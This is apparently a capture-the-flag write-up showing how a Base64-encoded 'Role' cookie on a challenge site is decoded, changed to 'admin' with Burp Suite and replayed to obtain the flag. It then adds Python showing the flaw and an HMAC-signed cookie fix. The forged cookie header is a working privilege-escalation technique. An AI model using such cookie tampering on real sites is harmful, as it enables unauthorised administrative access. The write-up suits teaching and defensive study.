Go, get some tasty dinner over at Joe's Fish Shop! If you know how to play the admin, you'll get free dessert! :)
Solution:
This is the first challenge we solved. We used Burp Suite Pro (BSP) to intercept
all our traffic to/from the challenge web site. Loading the initial page
for challenge 12, we captured the following HTTP headers in the response:

    HTTP/1.0 200 OK
    Date: Wed, 25 Jan 2012 13:06:49 GMT
    Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.9 with Suhosin-Patch
    X-Powered-By: PHP/5.3.9
    Content-Length: 1659
    Content-Type: text/html
    Set-Cookie: Role=bm9uX2FkbWlu
    Set-Cookie: ID=current_user
    Set-Cookie: _tmp=d0f0elfe
    Set-Cookie: access=none
    Connection: close

Notice the server is setting a cookie named Role to an alphanumeric value. Base64 encoded data is also alphanumeric. We sent the value of the Role cookie to the Decoder tab in BSP, selected Decode as Base64 and saw this:

    non_admin

That's interesting. We used BSP's Decoder tab to Base64 encode the string admin, and copied the result (YWRtaW4=) to the clipboard. We then reloaded the challenge page, caught the request in BSP's Intercept tab, and changed the value of the Role cookie to YWRtaW4=. The modified Cookie header looked like:

    Cookie: Role=YWRtaW4=; ID=current_user; _tmp=d0f0elfe; access=none

After forwarding the modified request on to the server, we received the flag:
Welcome Administrator. Please take your flag: x0sld0ef0d
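
The root cause is that the Role cookie is encoded but not authenticated, so the server accepts any value the client sends. The following is an added example, not code from the challenge or from this write-up: naive_role is an assumed model of the behaviour observed above, and issue_role_cookie, verify_role_cookie and SECRET_KEY are hypothetical names showing an HMAC-signed alternative.

```python
import base64
import binascii
import hashlib
import hmac

# Constructed key for this demo; a real deployment loads it from secret storage.
SECRET_KEY = b"constructed-demo-key-not-from-the-page"


def naive_role(cookie_value):
    """Assumed model of the challenge: Base64-decode the cookie and trust it."""
    return base64.b64decode(cookie_value).decode("ascii")


def _tag(payload):
    """HMAC-SHA256 over the encoded payload, hex encoded."""
    return hmac.new(SECRET_KEY, payload.encode("utf-8"), hashlib.sha256).hexdigest()


def issue_role_cookie(role):
    """Hardened issue: '<base64 role>.<hmac tag>'."""
    payload = base64.urlsafe_b64encode(role.encode("ascii")).decode("ascii")
    return payload + "." + _tag(payload)


def verify_role_cookie(cookie_value):
    """Return the role only if the tag verifies; otherwise None."""
    payload, sep, tag = cookie_value.rpartition(".")
    if not sep:
        return None  # bare Base64 value with no tag, as in the challenge
    # Constant-time comparison on bytes avoids leaking how much of the tag matched.
    if not hmac.compare_digest(tag.encode("utf-8"), _tag(payload).encode("utf-8")):
        return None
    try:
        return base64.urlsafe_b64decode(payload).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    print(naive_role("YWRtaW4="))            # the edited cookie is trusted
    cookie = issue_role_cookie("non_admin")
    print(verify_role_cookie(cookie))        # untouched cookie verifies
    forged = "YWRtaW4=." + cookie.rpartition(".")[2]
    print(verify_role_cookie(forged))        # payload swapped, tag no longer matches
```

Keeping the role in server-side session state and sending only an opaque session identifier removes the role from the client entirely.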